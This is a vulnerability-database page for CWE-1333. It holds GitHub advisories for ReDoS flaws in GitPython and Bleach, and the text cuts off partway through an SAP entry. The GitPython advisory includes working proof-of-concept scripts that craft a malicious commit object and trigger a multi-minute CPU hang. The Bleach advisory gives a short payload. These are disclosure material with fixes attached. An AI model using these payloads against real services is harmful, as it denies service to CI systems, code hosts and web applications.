CWE-1333
AllowedInefficient Regular Expression Complexity
Abstraction: Base · Status: Draft
The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.
886 vulnerabilities reference this CWE, most recent first.
GHSA-G5VV-9GXW-82HX
Vulnerability from github – Published: 2026-09-30 23:29 – Updated: 2026-09-30 23:29Summary
GitPython's Actor.name_email_regex regular expression (git/util.py, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the author or committer header of a git commit
object that contains a long string with an unterminated < (no matching >), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
.author or .committer for over two minutes per invocation, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
Details
Vulnerable file and line:
git/util.py, line 863:
name_email_regex = re.compile(r"(.*) <(.*?)>")
This regex is evaluated inside Actor._from_string() (line 909) every time
GitPython resolves a commit's .author or .committer property.
Full call chain — from public API to vulnerable sink:
commit.author # any ordinary GitPython API call └── git/objects/commit.py:917 Commit._deserialize() └── git/objects/util.py:341 parse_actor_and_date(author_line) └── git/util.py:909 Actor._from_string(string) └── Actor.name_email_regex.search(string) ← VULNERABLE
author_line is decoded directly from the raw bytes of the git commit object with
no length limit, character restriction, or timeout applied at any point before
reaching the regex engine. The same chain is triggered by:
- commit.author
- commit.committer
- repo.iter_commits()
- repo.blame()
- Any web service / CI tool that displays or processes commit metadata
Why this pattern backtracks catastrophically:
The pattern (.*) <(.*?)> contains an unbounded greedy group (.*) followed by
a literal space and <. When the input is a long string that contains < but no
closing >, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):
| Author field length (bytes) | Time to resolve .author |
|---|---|
| 1,000 | 0.0035 s |
| 5,000 | 0.084 s |
| 10,000 | 0.341 s |
| 20,000 | 1.525 s |
| 40,000 | 5.963 s |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| 200,000 | 150.488 s |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 → 80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself imposes no practical size limit on author name fields in the object format.
How the malicious object reaches a victim:
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into .git/objects/. git cat-file -t <sha> confirms
it is a valid commit type and git's own read-side tools display it without error.
Only git's write-side tooling (git commit --author, git update-index,
explicit git fsck) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with
receive.fsckObjects = false(common in self-hosted deployments) - A
.gitdirectory shipped as a tarball, backup, or zip archive - A git bundle file
- Any automated mirror or import tool that operates at the object level
PoC
Environment used for testing: - GitPython 3.1.59, installed in editable mode from source (no code modifications) - Python 3.12.3, git 2.43.0, Ubuntu 24.04
Script 1 — craft the malicious repository (craft_malicious_repo.py):
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '<'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py <target_dir> <payload_size_bytes>
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
if len(sys.argv) != 3:
print(f"usage: {sys.argv[0]} <target_dir> <payload_size_bytes>")
sys.exit(1)
target_dir, payload_size = sys.argv[1], int(sys.argv[2])
os.makedirs(target_dir, exist_ok=True)
run(["git", "init", "--quiet"], cwd=target_dir)
run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
run(["git", "config", "user.name", "PoC"], cwd=target_dir)
with open(os.path.join(target_dir, "README.txt"), "w") as f:
f.write("GitPython ReDoS PoC repository\n")
run(["git", "add", "README.txt"], cwd=target_dir)
tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
malicious_name = "A" * payload_size
# Key: author field contains a '<' with no closing '>'
author_line = f"author {malicious_name} <unterminated 1691999972 -0700"
committer_line = "committer PoC <poc@example.com> 1691999972 -0700"
message = "ReDoS PoC commit"
commit_content = (
f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
).encode()
header = f"commit {len(commit_content)}\x00".encode()
store = header + commit_content
sha = hashlib.sha1(store).hexdigest()
compressed = zlib.compress(store)
objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
os.makedirs(objdir, exist_ok=True)
with open(os.path.join(objdir, sha[2:]), "wb") as f:
f.write(compressed)
run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
print(f"Malicious commit sha : {sha}")
print(f"Payload size : {payload_size} bytes")
verify = subprocess.run(
["git", "cat-file", "-t", sha],
cwd=target_dir, capture_output=True, text=True
)
print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
main()
Script 2 — trigger the vulnerability (trigger_redos.py):
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -> Actor.name_email_regex.search().
Usage: python3 trigger_redos.py <repo_dir> <commit_sha>
"""
import sys, time, git
def main():
if len(sys.argv) != 3:
print(f"usage: {sys.argv[0]} <repo_dir> <commit_sha>")
sys.exit(1)
repo = git.Repo(sys.argv[1])
commit = repo.commit(sys.argv[2])
print("Accessing commit.author — triggers Actor._from_string()...")
t0 = time.time()
author = commit.author # ← this single line causes the hang
elapsed = time.time() - t0
print(f"Author name length : {len(author.name)} chars")
print(f"Elapsed : {elapsed:.3f} seconds")
print("RESULT: VULNERABLE" if elapsed > 5 else "RESULT: not triggered")
if __name__ == "__main__":
main()
Execution and observed output:
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000 Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de Payload size : 200000 bytes git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de Accessing commit.author — triggers Actor._from_string()... Author name length : 200014 chars Elapsed : 150.488 seconds RESULT: VULNERABLE
Docker reproduction (fully isolated environment):
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update && apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo <SHA>
The python:3.8-bookworm base image matches the one used in GitPython's own
fuzzing/local-dev-helpers/Dockerfile.
Impact
Who is affected:
Any application that uses GitPython to parse commits from a source it does not fully control. High-risk deployments include:
- CI/CD systems (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.) that clone and inspect third-party pull requests — one malicious commit in a PR can stall every worker that processes it.
- Code-hosting or code-review web services that render commit author information — a single crafted push blocks every page render or API response that touches that commit's metadata.
- Security or compliance scanners that walk repository history across many repositories — one crafted object in any repository exhausts a scanner worker.
Severity of impact:
A 200 KB author field blocks a process for ~150 seconds per single .author
access. When iter_commits() or blame are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude < and > from the name
group, removing the ambiguity that forces O(n²) backtracking:
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) <(.*?)>")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^<>]*) <([^<>]*)>")
Because the name group can no longer itself contain a < character, the engine
has exactly one candidate position to try when a closing > is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (Name <email>) never
contain < or > in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number of characters GitPython will attempt to parse in an author/committer line (e.g. rejecting strings longer than 4096 bytes before passing them to any regex) would further limit the blast radius of any future ReDoS class in this parser.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.59"
},
"package": {
"ecosystem": "PyPI",
"name": "GitPython"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.60"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-87819"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-30T23:29:14Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nGitPython\u0027s `Actor.name_email_regex` regular expression (`git/util.py`, line 863)\nis vulnerable to catastrophic backtracking (ReDoS \u2014 Regular Expression Denial of\nService). When GitPython parses the `author` or `committer` header of a git commit\nobject that contains a long string with an unterminated `\u003c` (no matching `\u003e`), the\nPython regex engine enters quadratic backtracking, causing complete single-threaded\nCPU exhaustion proportional to the square of the input length.\n\nA single crafted commit object can block any GitPython API call that reads\n`.author` or `.committer` for **over two minutes per invocation**, enabling denial\nof service against CI runners, code-hosting backends, repository-scanning\npipelines, or any service that processes commits from third-party or untrusted\nrepositories.\n\n---\n\n### Details\n\n**Vulnerable file and line:**\n\n`git/util.py`, line 863:\n\n```python\nname_email_regex = re.compile(r\"(.*) \u003c(.*?)\u003e\")\n```\n\nThis regex is evaluated inside `Actor._from_string()` (line 909) every time\nGitPython resolves a commit\u0027s `.author` or `.committer` property.\n\n**Full call chain \u2014 from public API to vulnerable sink:**\n\n\n\n\ncommit.author # any ordinary GitPython API call\n\u2514\u2500\u2500 git/objects/commit.py:917\nCommit._deserialize()\n\u2514\u2500\u2500 git/objects/util.py:341\nparse_actor_and_date(author_line)\n\u2514\u2500\u2500 git/util.py:909\nActor._from_string(string)\n\u2514\u2500\u2500 Actor.name_email_regex.search(string) \u2190 VULNERABLE\n\n\n\n\n`author_line` is decoded directly from the raw bytes of the git commit object with\n**no length limit, character restriction, or timeout** applied at any point before\nreaching the regex engine. The same chain is triggered by:\n- `commit.author`\n- `commit.committer`\n- `repo.iter_commits()`\n- `repo.blame()`\n- Any web service / CI tool that displays or processes commit metadata\n\n**Why this pattern backtracks catastrophically:**\n\nThe pattern `(.*) \u003c(.*?)\u003e` contains an unbounded greedy group `(.*)` followed by\na literal space and `\u003c`. When the input is a long string that contains `\u003c` but no\nclosing `\u003e`, the regex engine must try every possible split position for the greedy\ngroup \u2014 O(n\u00b2) candidate positions for a string of length n \u2014 each of which then\ndrives the inner lazy group into further sub-match attempts. This is the\nwell-documented \"catastrophic backtracking\" failure mode for this family of\npatterns.\n\n**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**\n\n| Author field length (bytes) | Time to resolve `.author` |\n|-----------------------------|--------------------------|\n| 1,000 | 0.0035 s |\n| 5,000 | 0.084 s |\n| 10,000 | 0.341 s |\n| 20,000 | 1.525 s |\n| 40,000 | 5.963 s |\n| 60,000 | 13.360 s |\n| 80,000 | 23.871 s |\n| **200,000** | **150.488 s** |\n\nEach doubling of input size roughly quadruples processing time (e.g. 40,000 \u2192\n80,000 bytes: 5.96 s \u2192 23.87 s \u2248 4.0\u00d7), confirming O(n\u00b2) growth. Git itself\nimposes **no practical size limit** on author name fields in the object format.\n\n**How the malicious object reaches a victim:**\n\nThe PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git\nloose object written directly into `.git/objects/`. `git cat-file -t \u003csha\u003e` confirms\nit is a valid `commit` type and git\u0027s own read-side tools display it without error.\nOnly git\u0027s write-side tooling (`git commit --author`, `git update-index`,\nexplicit `git fsck`) applies the sanity checks that would reject a malformed author\nline. Delivery paths that bypass those checks include:\n\n- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)\n- A `.git` directory shipped as a tarball, backup, or zip archive\n- A git bundle file\n- Any automated mirror or import tool that operates at the object level\n\n---\n\n### PoC\n\n**Environment used for testing:**\n- GitPython 3.1.59, installed in editable mode from source (no code modifications)\n- Python 3.12.3, git 2.43.0, Ubuntu 24.04\n\n**Script 1 \u2014 craft the malicious repository (`craft_malicious_repo.py`):**\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCreates a git repository with one commit whose \u0027author\u0027 field is a large\nstring containing an unterminated \u0027\u003c\u0027. Bypasses git\u0027s write-side sanity\nchecks by writing the raw object directly into .git/objects/.\n\nUsage: python3 craft_malicious_repo.py \u003ctarget_dir\u003e \u003cpayload_size_bytes\u003e\n\"\"\"\nimport hashlib, os, subprocess, sys, zlib\n\ndef run(cmd, cwd):\n return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)\n\ndef main():\n if len(sys.argv) != 3:\n print(f\"usage: {sys.argv[0]} \u003ctarget_dir\u003e \u003cpayload_size_bytes\u003e\")\n sys.exit(1)\n\n target_dir, payload_size = sys.argv[1], int(sys.argv[2])\n\n os.makedirs(target_dir, exist_ok=True)\n run([\"git\", \"init\", \"--quiet\"], cwd=target_dir)\n run([\"git\", \"config\", \"user.email\", \"poc@example.com\"], cwd=target_dir)\n run([\"git\", \"config\", \"user.name\", \"PoC\"], cwd=target_dir)\n\n with open(os.path.join(target_dir, \"README.txt\"), \"w\") as f:\n f.write(\"GitPython ReDoS PoC repository\\n\")\n run([\"git\", \"add\", \"README.txt\"], cwd=target_dir)\n tree_sha = run([\"git\", \"write-tree\"], cwd=target_dir).stdout.strip()\n\n malicious_name = \"A\" * payload_size\n # Key: author field contains a \u0027\u003c\u0027 with no closing \u0027\u003e\u0027\n author_line = f\"author {malicious_name} \u003cunterminated 1691999972 -0700\"\n committer_line = \"committer PoC \u003cpoc@example.com\u003e 1691999972 -0700\"\n message = \"ReDoS PoC commit\"\n\n commit_content = (\n f\"tree {tree_sha}\\n{author_line}\\n{committer_line}\\n\\n{message}\\n\"\n ).encode()\n\n header = f\"commit {len(commit_content)}\\x00\".encode()\n store = header + commit_content\n sha = hashlib.sha1(store).hexdigest()\n compressed = zlib.compress(store)\n\n objdir = os.path.join(target_dir, \".git\", \"objects\", sha[:2])\n os.makedirs(objdir, exist_ok=True)\n with open(os.path.join(objdir, sha[2:]), \"wb\") as f:\n f.write(compressed)\n\n run([\"git\", \"update-ref\", \"refs/heads/master\", sha], cwd=target_dir)\n\n print(f\"Malicious commit sha : {sha}\")\n print(f\"Payload size : {payload_size} bytes\")\n verify = subprocess.run(\n [\"git\", \"cat-file\", \"-t\", sha],\n cwd=target_dir, capture_output=True, text=True\n )\n print(f\"git cat-file -t confirms: {verify.stdout.strip()}\")\n\nif __name__ == \"__main__\":\n main()\n```\n\n**Script 2 \u2014 trigger the vulnerability (`trigger_redos.py`):**\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOpens the repository with GitPython and times commit.author access,\nwhich triggers Actor._from_string() -\u003e Actor.name_email_regex.search().\n\nUsage: python3 trigger_redos.py \u003crepo_dir\u003e \u003ccommit_sha\u003e\n\"\"\"\nimport sys, time, git\n\ndef main():\n if len(sys.argv) != 3:\n print(f\"usage: {sys.argv[0]} \u003crepo_dir\u003e \u003ccommit_sha\u003e\")\n sys.exit(1)\n\n repo = git.Repo(sys.argv[1])\n commit = repo.commit(sys.argv[2])\n\n print(\"Accessing commit.author \u2014 triggers Actor._from_string()...\")\n t0 = time.time()\n author = commit.author # \u2190 this single line causes the hang\n elapsed = time.time() - t0\n\n print(f\"Author name length : {len(author.name)} chars\")\n print(f\"Elapsed : {elapsed:.3f} seconds\")\n print(\"RESULT: VULNERABLE\" if elapsed \u003e 5 else \"RESULT: not triggered\")\n\nif __name__ == \"__main__\":\n main()\n```\n**Execution and observed output:**\n\n\n\n\n$ python3 craft_malicious_repo.py /tmp/victim-repo 200000\nMalicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de\nPayload size : 200000 bytes\ngit cat-file -t confirms: commit\n\n$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de\nAccessing commit.author \u2014 triggers Actor._from_string()...\nAuthor name length : 200014 chars\nElapsed : 150.488 seconds\nRESULT: VULNERABLE\n\n\n\n**Docker reproduction (fully isolated environment):**\n\n```bash\ndocker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash\n\n# Inside the container:\napt-get update \u0026\u0026 apt-get install -y git\ngit clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython\npip install -e /work/GitPython\n\npython3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000\n# note the SHA printed, then:\npython3 /work/poc/trigger_redos.py /work/victim-repo \u003cSHA\u003e\n```\n\nThe `python:3.8-bookworm` base image matches the one used in GitPython\u0027s own\n`fuzzing/local-dev-helpers/Dockerfile`.\n\n---\n\n### Impact\n\n**Who is affected:**\n\nAny application that uses GitPython to parse commits from a source it does not\nfully control. High-risk deployments include:\n\n- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)\n that clone and inspect third-party pull requests \u2014 one malicious commit in a PR\n can stall every worker that processes it.\n- **Code-hosting or code-review web services** that render commit author information\n \u2014 a single crafted push blocks every page render or API response that touches that\n commit\u0027s metadata.\n- **Security or compliance scanners** that walk repository history across many\n repositories \u2014 one crafted object in any repository exhausts a scanner worker.\n\n**Severity of impact:**\n\nA 200 KB author field blocks a process for ~150 seconds per single `.author`\naccess. When `iter_commits()` or `blame` are used, every commit in a history\ntraversal can be independently crafted, multiplying the total hang time by the\nnumber of commits processed. There is no confidentiality or integrity impact \u2014\nthis is a pure availability / resource-exhaustion vulnerability.\n\n---\n\n### Suggested Fix\n\nReplace the vulnerable pattern with one that cannot backtrack catastrophically.\nThe minimal, behavior-preserving fix is to exclude `\u003c` and `\u003e` from the name\ngroup, removing the ambiguity that forces O(n\u00b2) backtracking:\n\n```python\n# git/util.py, line 863\n# Before (vulnerable):\nname_email_regex = re.compile(r\"(.*) \u003c(.*?)\u003e\")\n\n# After (fixed \u2014 identical output for all well-formed input):\nname_email_regex = re.compile(r\"([^\u003c\u003e]*) \u003c([^\u003c\u003e]*)\u003e\")\n```\n\nBecause the name group can no longer itself contain a `\u003c` character, the engine\nhas exactly one candidate position to try when a closing `\u003e` is absent \u2014 and fails\nin O(n) time instead of O(n\u00b2). Legitimate actor strings (`Name \u003cemail\u003e`) never\ncontain `\u003c` or `\u003e` in either field, so this change produces identical results for\nall valid input.\n\nAs defense in depth, independently of the regex fix, bounding the maximum number\nof characters GitPython will attempt to parse in an author/committer line (e.g.\nrejecting strings longer than 4096 bytes before passing them to any regex) would\nfurther limit the blast radius of any future ReDoS class in this parser.",
"id": "GHSA-g5vv-9gxw-82hx",
"modified": "2026-09-30T23:29:14Z",
"published": "2026-09-30T23:29:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-g5vv-9gxw-82hx"
},
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/pull/2215"
},
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/commit/751473a5f3221d6f989291cbebcc404353fd3ba8"
},
{
"type": "PACKAGE",
"url": "https://github.com/gitpython-developers/GitPython"
},
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.60"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3984.yaml"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/gitpython-before-3.1.60-denial-of-service-via-redos"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "GitPython: Denial of Service via catastrophic backtracking (ReDoS) in Actor.name_email_regex \u2014 commit author/committer field parsing"
}
GHSA-G75F-G53V-794X
Vulnerability from github – Published: 2026-06-16 14:07 – Updated: 2026-06-16 14:07Summary
Bleach 6.3.0 exposes a documented email-linkification path through bleach.linkify(..., parse_email=True). The implementation scans attacker-controlled text with EMAIL_RE.finditer() over the full character token and has no length, timeout, or linear prefilter before applying the dot-atom email regex. A non-email payload around 30 KB causes multi-second CPU consumption per request/call, creating a direct availability risk for applications that enable email linkification on user-submitted text.
Affected Product
- Package:
bleach - Ecosystem: pip
- Affected versions: verified in
6.3.0; exact first affected version not established - Patched versions: none known at finalization time
- Tested version:
6.3.0 - Audit commit/tag:
v6.3.0/5546d5dbce60d08ccb99d981778d74044d646d4e - PyPI sdist SHA256:
6f3b91b1c0a02bb9a78b5a454c92506aa0fdf197e1d5e114d2e00c6f64306d22
Vulnerability Details
- CWE: CWE-1333: Inefficient Regular Expression Complexity; related availability impact maps to CWE-400
- Component:
bleach/linkifier.py,build_email_re(),LinkifyFilter.handle_email_addresses() - Root cause:
handle_email_addresses()callsself.email_re.finditer(text)on attacker-controlled text.EMAIL_REincludes a repeated dot-atom local-part pattern, so non-email strings such as repeateda.segments with no@force repeated long failing scans. - Security boundary violated: user-submitted text processed by a documented safe linkification helper should not allow an attacker to impose superlinear CPU cost through non-email text.
- Direct impact: per-request CPU exhaustion / denial-of-service risk in applications that enable
parse_email=Trueon attacker-controlled text. - Chain impact, if any: one proof run observed an unrelated
/healthrequest delayed during a concurrent attack request, but this was not reliable across reviewer retests. Treat cross-request service degradation as environment-dependent supporting evidence, not the primary impact. - Severity estimate: Medium / availability-only. The feature is opt-in and deployment body limits/timeouts affect practical severity.
Relevant code path:
- bleach/__init__.py:85-125: public linkify(text, ..., parse_email=False) constructs Linker(..., parse_email=parse_email) and calls linker.linkify(text).
- bleach/linkifier.py:77-88: EMAIL_RE is compiled from the dot-atom email pattern.
- bleach/linkifier.py:292-301: handle_email_addresses() applies self.email_re.finditer(text) to each character token.
- bleach/linkifier.py:620-623: character tokens are routed into email handling only when parse_email is true.
- docs/goals.rst:30-40: Bleach documents user comments, profile bios, and descriptions as target untrusted text use cases.
- docs/linkify.rst:300-305: parse_email=True is the documented option for creating mailto: links.
Attack Preconditions
- The consuming application enables the documented
parse_email=Trueoption, for examplebleach.linkify(user_text, parse_email=True)orLinker(parse_email=True).linkify(user_text). - The attacker can submit text that reaches that linkification path. Authentication depends on the host application; a public comment form would make this unauthenticated, while account-only text fields require user privileges.
- The application allows roughly 20-30 KB of text to reach Bleach and lacks a strict timeout or input cap before linkification.
- No custom bounded
email_reis supplied.
Reproduction
Minimal API trigger:
import bleach
payload = ("a." * 15000) + "a"
bleach.linkify(payload, parse_email=True)
The saved HTTP proof uses a local harness with POST /preview calling bleach.linkify(request_body, parse_email=True) and a control endpoint using parse_email=False on the same payload. The exploit sends baseline/control/attack requests over HTTP to 127.0.0.1.
Proof Evidence
The proof ran against Bleach 6.3.0 installed from the audited local checkout in an isolated temporary venv. It used Python 3.12.3 on Linux.
Measured HTTP proof results:
- Payload: ("a." * 15000) + "a" (30001 bytes)
- Normal baseline /preview mean: 0.001425 seconds
- Same 30 KB payload with parse_email=False: 0.048349 seconds
- Attack payload with parse_email=True: 8.719818 seconds
- Slowdown versus the larger baseline/control mean: 180.35x
- Requests sent by proof: 20
Evidence files: poc.py poc_results.json exploit_proof.py exploit_results.json
Scope and Limitations
- This report does not claim XSS, authentication bypass, data disclosure, remote code execution, persistent crash, or persistent service outage.
parse_email=Trueis not the default. The affected path is a documented opt-in feature.- The exact first affected version is not established.
- Practical impact depends on host application input limits, worker model, request timeout policy, and whether untrusted users can submit text to an email-linkification path.
- A reviewer reproduced the direct CPU cost but did not reproduce the proof harness’s
/healthdelay. The direct impact claim is therefore limited to per-request CPU exhaustion. - Bleach is marked deprecated in
README.rst, andSECURITY.mdhas stale supported-version text, but the package still has a 2025 PyPI release and published Mozilla security reporting routes.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bleach"
},
"versions": [
"6.3.0"
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T14:07:30Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\nBleach 6.3.0 exposes a documented email-linkification path through `bleach.linkify(..., parse_email=True)`. The implementation scans attacker-controlled text with `EMAIL_RE.finditer()` over the full character token and has no length, timeout, or linear prefilter before applying the dot-atom email regex. A non-email payload around 30 KB causes multi-second CPU consumption per request/call, creating a direct availability risk for applications that enable email linkification on user-submitted text.\n\n## Affected Product\n- Package: `bleach`\n- Ecosystem: pip\n- Affected versions: verified in `6.3.0`; exact first affected version not established\n- Patched versions: none known at finalization time\n- Tested version: `6.3.0`\n- Audit commit/tag: `v6.3.0` / `5546d5dbce60d08ccb99d981778d74044d646d4e`\n- PyPI sdist SHA256: `6f3b91b1c0a02bb9a78b5a454c92506aa0fdf197e1d5e114d2e00c6f64306d22`\n\n## Vulnerability Details\n- CWE: CWE-1333: Inefficient Regular Expression Complexity; related availability impact maps to CWE-400\n- Component: `bleach/linkifier.py`, `build_email_re()`, `LinkifyFilter.handle_email_addresses()`\n- Root cause: `handle_email_addresses()` calls `self.email_re.finditer(text)` on attacker-controlled text. `EMAIL_RE` includes a repeated dot-atom local-part pattern, so non-email strings such as repeated `a.` segments with no `@` force repeated long failing scans.\n- Security boundary violated: user-submitted text processed by a documented safe linkification helper should not allow an attacker to impose superlinear CPU cost through non-email text.\n- Direct impact: per-request CPU exhaustion / denial-of-service risk in applications that enable `parse_email=True` on attacker-controlled text.\n- Chain impact, if any: one proof run observed an unrelated `/health` request delayed during a concurrent attack request, but this was not reliable across reviewer retests. Treat cross-request service degradation as environment-dependent supporting evidence, not the primary impact.\n- Severity estimate: Medium / availability-only. The feature is opt-in and deployment body limits/timeouts affect practical severity.\n\nRelevant code path:\n- `bleach/__init__.py:85-125`: public `linkify(text, ..., parse_email=False)` constructs `Linker(..., parse_email=parse_email)` and calls `linker.linkify(text)`.\n- `bleach/linkifier.py:77-88`: `EMAIL_RE` is compiled from the dot-atom email pattern.\n- `bleach/linkifier.py:292-301`: `handle_email_addresses()` applies `self.email_re.finditer(text)` to each character token.\n- `bleach/linkifier.py:620-623`: character tokens are routed into email handling only when `parse_email` is true.\n- `docs/goals.rst:30-40`: Bleach documents user comments, profile bios, and descriptions as target untrusted text use cases.\n- `docs/linkify.rst:300-305`: `parse_email=True` is the documented option for creating `mailto:` links.\n\n## Attack Preconditions\n- The consuming application enables the documented `parse_email=True` option, for example `bleach.linkify(user_text, parse_email=True)` or `Linker(parse_email=True).linkify(user_text)`.\n- The attacker can submit text that reaches that linkification path. Authentication depends on the host application; a public comment form would make this unauthenticated, while account-only text fields require user privileges.\n- The application allows roughly 20-30 KB of text to reach Bleach and lacks a strict timeout or input cap before linkification.\n- No custom bounded `email_re` is supplied.\n\n## Reproduction\nMinimal API trigger:\n\n```python\nimport bleach\npayload = (\"a.\" * 15000) + \"a\"\nbleach.linkify(payload, parse_email=True)\n```\n\nThe saved HTTP proof uses a local harness with `POST /preview` calling `bleach.linkify(request_body, parse_email=True)` and a control endpoint using `parse_email=False` on the same payload. The exploit sends baseline/control/attack requests over HTTP to `127.0.0.1`.\n\n## Proof Evidence\nThe proof ran against Bleach `6.3.0` installed from the audited local checkout in an isolated temporary venv. It used Python `3.12.3` on Linux.\n\nMeasured HTTP proof results:\n- Payload: `(\"a.\" * 15000) + \"a\"` (`30001` bytes)\n- Normal baseline `/preview` mean: `0.001425` seconds\n- Same 30 KB payload with `parse_email=False`: `0.048349` seconds\n- Attack payload with `parse_email=True`: `8.719818` seconds\n- Slowdown versus the larger baseline/control mean: `180.35x`\n- Requests sent by proof: `20`\n\nEvidence files:\n[poc.py](https://github.com/user-attachments/files/27129729/poc.py)\n[poc_results.json](https://github.com/user-attachments/files/27129737/poc_results.json)\n[exploit_proof.py](https://github.com/user-attachments/files/27129751/exploit_proof.py)\n[exploit_results.json](https://github.com/user-attachments/files/27129752/exploit_results.json)\n\n## Scope and Limitations\n- This report does not claim XSS, authentication bypass, data disclosure, remote code execution, persistent crash, or persistent service outage.\n- `parse_email=True` is not the default. The affected path is a documented opt-in feature.\n- The exact first affected version is not established.\n- Practical impact depends on host application input limits, worker model, request timeout policy, and whether untrusted users can submit text to an email-linkification path.\n- A reviewer reproduced the direct CPU cost but did not reproduce the proof harness\u2019s `/health` delay. The direct impact claim is therefore limited to per-request CPU exhaustion.\n- Bleach is marked deprecated in `README.rst`, and `SECURITY.md` has stale supported-version text, but the package still has a 2025 PyPI release and published Mozilla security reporting routes.",
"id": "GHSA-g75f-g53v-794x",
"modified": "2026-06-16T14:07:30Z",
"published": "2026-06-16T14:07:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mozilla/bleach/security/advisories/GHSA-g75f-g53v-794x"
},
{
"type": "PACKAGE",
"url": "https://github.com/mozilla/bleach"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Bleach linkify(parse_email=True) CPU exhaustion via unbounded email regex scanning"
}
GHSA-G76P-CFX7-WH4J
Vulnerability from github – Published: 2026-08-25 03:32 – Updated: 2026-08-25 03:32SAP S/4HANA (Private Cloud) uses a third-party component that contains a Regular Expression Denial of Service (ReDoS) vulnerability. An unauthenticated attacker could supply specially crafted input that triggers excessive processing within the affected functionality. Successful exploitation could exhaust system resources and make the service unavailable, resulting in a high impact on availability. There is no impact on confidentiality and integrity.
{
"affected": [],
"aliases": [
"CVE-2026-66766"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
